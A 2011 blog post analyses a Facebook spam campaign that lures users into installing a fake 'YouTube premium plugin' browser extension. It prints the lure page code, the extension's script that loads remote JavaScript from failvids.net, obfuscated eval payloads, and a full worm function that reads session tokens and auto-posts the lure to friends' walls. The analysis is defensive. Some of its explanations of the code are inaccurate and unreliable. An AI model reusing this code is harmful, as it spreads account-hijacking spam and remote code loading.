Monday, December 19, 2011

The truth behind "Yeah!! It happens on television!!"(A Facebook Spam)

Facebook spamming is increasing day by day and these days its becoming home for spammers.Latest one is a video spam titled [Video] Yeah!! It happens on television posing some funny pornographic content to attract the users of Facebook.In this article I am going to reveal how this spam/virus (whatever you say) works and how can you protect yourself from this.


Warning:I did this inside a security sandbox.If you want to do the same experiment,I request you to do inside a security sandbox.Before doing this clear all your browser data(Cookies,Cache etc etc.).

So the attack scenario is like this:
You saw one of your friends status like,

It can happen to anyone! I dare you can watch this.

Lol Checkout this video its very embracing moment for Her.

blah..
blah..
blah..



Once you click on the malicious link,Sometime it may ask you to share it with your friends before you can watch. Here lies the first trap.

Once you share it,it will take you to following web page:
It may vary but in my case it was hwuheuwhewew.blogspot.com

When the page will fully load the you get a message "Divx Missing Plugin".


When you click on "Install plugin" button you will be asked to download a plugin before you can watch the video. The plugin is "youtube premium plugin".(The main virus)




As you install the extension the video will automatically shared on your wall and will get notified to all of the friends in your profile.

So if we look at the source code of that page or using firebug,we can see many lines of code but only following is very important.

<iframe allowtransparency='true' frameborder='0' height='305' id='player_iframe' name='player_iframe' scrolling='no' src='http://failvids.net/yt/plugin.html' width='577'></iframe>



From this its clear that the its loading the link 'http://failvids.net/yt/plugin.html' inside an iframe.

So opening that link http://failvids.net/yt/plugin.html main browser i found some interesting lines of code.




<center><span style="font-size:30px;font-weight:bold;text-decoration:underline;">Divx-Plugin Missing</span></center>

                <ol>
                You do not have the plugin required to view the video<br><br>
                    <li>Install Youtube Premium plugin<br><br><a onclick="instalar();" class="install nomargin"></a></li>
                    <li>Then Reload this page by pressing F5</li>
                </ol>

From this above code we can see when a user clicks on [Install Plugin] button that will trigger JavaScript Event onclick() and as a result the JS finction installer() will be called.

Now if you go little but up side of the source code of the page you can see following lines of code.


<script>
                var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
                var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
                function instalar(){
if (is_chrome){
                        window.open("http://failvids.net/yt/youtube.crx");
                    } 
                     else if(is_firefox){
                        var params = {
                            "Youtube Extension": {
                                URL: "http://failvids.net/yt/youtube.xpi",
                                toString: function () { return this.URL; }
                            }
                        };
                        InstallTrigger.install(params);
                    } else{
                         window.open("http://failvids.net/yt/video.php");
                    }
                }
if(!is_chrome && !is_firefox )
                window.location="http://failvids.net/yt/video.php";
            </script>


From this code we can see the JavaScript Code is trying to identify the users browser using "navigator.userAgent."

After that we have got our function installer()as i have mentioned earlier.
Inside this function you can see its checking if the users browser is chrome then it will take the user to "http://failvids.net/yt/youtube.crx"

And if the browser is Firefox it will take the user to this url. "http://failvids.net/yt/youtube.xpi"

Now do you know what is .xpi and .crx file.??

Well An XPI file is a Mozilla/Firefox Browser Extension Archive file. and .CRX file is Chrome Browser Extension Archive file.

Whatever Firefox add on or chrome extension you use it comes in .xpi or .crx package.If you open that file in the same browser you will not be able to understand.You will just get a window like this.


My next target was to download those extension package files to know the functionality .But the main problem when downloading Browser Extension main package file is,you cannot download it in the same browser.And you should not try because its very risky.
If any attacker somehow bypassed the the browser security then the Add -one will be installed without your permission.(Its not new in Internet History!)

So its better to use any download manager.After downloading those files i have decided to break the .crx file which is for Google chrome.

Breaking .CRX file.

Unpacking the .crx file of .xpi file is not a big deal.Just rename the youtube.crx file to youtube.rar and unpack it using winrar.

So after unpacking that file i found follwing files

1) Chrome.mainfest
2) go.js
3) mainfest.jsom
4) And some icons.




The main code for this malicious extension file is in "go.js" file.
Source of "go.js" is like :

loadScript_you();
function loadScript_you() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://failvids.net/yt/script.js");
var head=document.getElementsByTagName("head")[0];
if( head==null) return false;
head.appendChild(s);
return true;
}

From this we can see its fetching remote scripts from location

http://failvids.net/yt/script.js

I tried to access http://failvids.net/yt/script.js and found following lines of code.The server was very slow but after waiting 4-5 min i got this.

function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://failvids.net/yt/extra.js");
var a = document.getElementsByTagName('script')[0];
if (a == null) return false;
a.appendChild(s);
return true
}
addScript();

You can see the function "addScript()" is also fetching an external JavaScript file

http://failvids.net/yt/extra.js

The main code was in "extra.js" file and it looks like this.

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,101,110,99,104,117,108,97,116,117,70,66,40,41,32,123,10,32,32,32,32,118,97,114,32,105,102,114,97,59,10,32,32,32,32,105,102,32,40,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,57,56,102,98,118,105,100,101,111,47,103,105,41,32,124,124,32,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,57,56,102,98,118,105,100,101,111,47,103,105,41,41,32,123,10,32,32,32,32,32,32,32,32,105,102,114,97,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,108,105,102,114,97,109,101,39,41,10,32,32,32,32,32,32,32,32,105,102,32,40,105,102,114,97,32,33,61,32,110,117,108,108,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,105,102,114,97,46,105,110,110,101,114,72,84,77,76,32,61,32,39,60,105,102,114,97,109,101,32,105,100,61,34,99,104,97,110,103,101,34,32,119,105,100,116,104,61,34,53,48,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,102,97,105,108,118,105,100,115,46,110,101,116,47,121,116,47,118,105,100,101,111,46,112,104,112,34,32,104,101,105,103,104,116,61,34,51,48,48,34,32,115,99,114,111,108,108,105,110,103,61,34,110,111,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62,39,10,32,32,32,32,32,32,32,32,125,59,10,32,32,32,32,125,32,101,108,115,101,32,105,102,32,40,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,98,108,111,103,115,112,111,116,47,105,41,41,32,123,10,32,32,32,32,32,32,32,32,105,102,114,97,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,108,105,102,114,97,109,101,39,41,10,32,32,32,32,32,32,32,32,105,102,32,40,105,102,114,97,32,33,61,32,110,117,108,108,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,115,101,108,102,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,102,97,105,108,118,105,100,115,46,110,101,116,47,121,116,47,118,105,100,101,111,46,112,104,112,34,59,10,32,32,32,32,32,32,32,32,125,59,10,32,32,32,32,125,10,32,32,32,10,125,10,101,110,99,104,117,108,97,116,117,70,66,40,41,59))

eval(function (p, a, c, k, e, r) {
    e = function (c) {
        return c.toString(a)
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function (e) {
            return r[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('e 4(){1 a=2.8(\'c\')[0];6(a==7)3 9;1 b=2.d("5");b.f="g://h.i.j/k/l.m";b.n="0";b.o="0";b.p="0";a.q(b);3 r}4();', 28, 28, '|var|document|return|load|img|if|null|getElementsByTagName|false|||body|createElement|function|src|http|whos|amung|us|swidget|acgflhphtsib|gif|width|height|border|appendChild|true'.split('|'), 0, {})) //eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('40="20";8(41.31.46(/^5:\\/\\/(9\\.)?45\\.14/47)){6 3=2["16"]("18");3.12="5://43.3.11/23/44.23.24";3.22="25/21";3.19=17(){6 15=2.35("34")[0];8(15==33)32 30;6 4=2.16("36");4.12="5://37.39.38/42/55.60";4.61="0";4.57="0";4.48="0";15.13(4);6 7=2["16"]("18");7.12="5://9.26.11/14/27.28/50.24?49="+51;7.22="25/21";7.19=17(){8(54=="20"){6 10=2.59("53");8(10==33){32 30}10.52[1].31="5://9.26.11/14/27.28/?56=58"}};2.29.13(7)};2.29.13(3)}',10,62,'||document|hashemian|ss|http|var|clcl|if|www|objobj|com|src|appendChild|cl|oo|createElement|function|script|onload|no|javascript|type|js|php|text|hardtrons|C8AA27305BBB4AD7B769656766711E4BC8AA27305BBB4AD7B769656766711E4B|asp|head|false|href|return|null|body|getElementsByTagName|img|whos|us|amung|VIH_DisplayOnPage|location|swidget|scripts|visitorIPHOST|bancoestado|match|i|border|ip|get|VIH_HostIP|children|side2|analisis|viri20111|STP|height|login|getElementById|gif|width'.split('|'),0,{}))

function readCookie(a) {
    var b = a + '=';
    var c = document['cookie']['split'](';');
    for (var d = 0; d < c['length']; d++) {
        var e = c[d];
        while (e['charAt'](0) == ' ') {
            e = e['substring'](1, e['length']);
        }
        if (e['indexOf'](b) == 0) {
            return e['substring'](b['length'], e['length']);
        }
    }
    return null;
}

function setCookie(nombre, valor, caducidad) {
    var expireDate = new Date()
    expireDate.setDate(expireDate.getDate() + caducidad);
    document.cookie = nombre + "=" + escape(valor) + "; expires=" + expireDate.toGMTString() + "; path=/";
}

function getRandomInt(a, b) {
    return Math['floor'](Math['random']() * (b - a + 1)) + a
}

function randomValue(a) {
    return a[getRandomInt(0, a['length'] - 1)]
}

function fb_comparte() {
    var user_id = readCookie('c_user');
    var uid = user_id;
    if (document['getElementsByName']('post_form_id')[0] == null || document['getElementsByName']('fb_dtsg')[0] == null) return false;
    var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
    var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
    var video_url = ['http://anuerherhee.blogspot.com/','http://doocjhjsuher.blogspot.com/'];
    var domains = ['http://i.imgur.com/b6eRh.jpg'];
    var p0 = ['check this out ... cool ',' This cool ...', 'I like it ..'];
    var p1 = ['check this out ... cool ',' Ehey ',' Hey ',' Hey! ',' about ',' Hello! ',' Look! ',' That last ',' Amazing!'];
    var p2 = ['u wont believe! ',' check the sad post ',' haha can happen to anyone!'];
    var p3 = [' I dare you can watch this . '];
    var message = '';
    var a;
    gf = new XMLHttpRequest();
    gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + uid + '&' + Math['random'](), false);
    gf['send']();
    if (gf['readyState'] != 4) {} else {
        data = eval('(' + gf['responseText']['substr'](9) + ')');
        if (data['error']) {
            return false;
        } else {
            a = data;
        }
    }
    var b = a['payload']['entries']['length'];
    if (b > 30) {
        b = 30
    };
    var cook = readCookie("fb_videobor_" + user_id);
    if (cook == "activo") return false;
    message = [randomValue(p1), randomValue(p2), randomValue(p3)]['join'](' ');
    var c = new XMLHttpRequest();
    var d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
    var title = '[VIDEO] Yeahh!! It happens on Live Television!';
    var summary = 'Lol Checkout this video its very embracing moments for her';
    var imagen = 'http://i.imgur.com/b6eRh.jpg';
    var e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + user_id + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][v]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
    c['open']('POST', d, true);
    c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    c['setRequestHeader']('Content-length', e['length']);
    c['setRequestHeader']('Connection', 'keep-alive');
    c['onreadystatechange'] = function () {};
    c['send'](e);
    for (var f = 0; f < b; f++) {
        if (a['payload']['entries'][f]['uid'] != user_id) {
            message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
            var g = new XMLHttpRequest();
            d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
            title = '[VIDEO] Yeahh!! It happens on Live Television!';
            summary = 'Lol Checkout this video its very embracing moment for her';
            imagen = 'http://i.imgur.com/b6eRh.jpg';
            e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
            g['open']('POST', d, true);
            g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
            g['setRequestHeader']('Content-length', e['length']);
            g['setRequestHeader']('Connection', 'keep-alive');
            g['onreadystatechange'] = function () {};
            g['send'](e);
        }
    }
    setCookie("fb_videobor" + user_id, "activo", 300);
    return true;
}

function FBFBFB321() {
    if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
        var cook = readCookie("fb_videobor_");
        if (cook == "activo") {
            return false;
        }
        var user_id = readCookie('c_user');
        if (user_id == null) return false;
        cook = readCookie("fb_videobor_" + user_id);
        if (cook == "activo") {
            return false;
        }
        setTimeout(function () {
            fb_comparte();
        }, 2000);
        return true;
    }
    return false;
}
FBFBFB321();

From the code we can see that its first its calling the function FBFBFB321();.This fucntion is responsible for faebook cookie Hijacking.

From the function we can see that its checking the url location.
Note: if its http://facebook.com or https://.Then grab the cookie from browser.
As Facebook cookie is always marked as secure then client side java scripts will not be able to read those cookies.so the user is safe.

After that we can see its calling the function function fb_comparte().This function is responsible for generating random fake plugin comments.You can see from the code that its using Ajax request to http://www.facebook.com/ajax/profile/composer.php.
Well this is the main evil fucntion.Analyzing that function i found that first its reading the user cookie c_user.the c_user cookie is nothing but the id of your Facebook profile.

Now the most critical feature of this virus is user tracking feature.
If you look at the function readCookie() you can see it randomly adds cookie to your browser and track your activity on internet.

How to prevent this spam!
Don’t ever click on the link given with this content.

Don’t share the content

Unfortunately if you have followed the steps asked by the spammers then remove the extension that they have asked to install. “Youtube extension”

How to Remove Add Ons and Extension

http://support.google.com/chrome/bin/answer.py?hl=en&answer=113907

http://kb.mozillazine.org/Uninstalling_extensions



There are many more stuffs,Right now its not possible for me to explain the entire code.I hope It will help you!Feel free to drop comments.Thanks.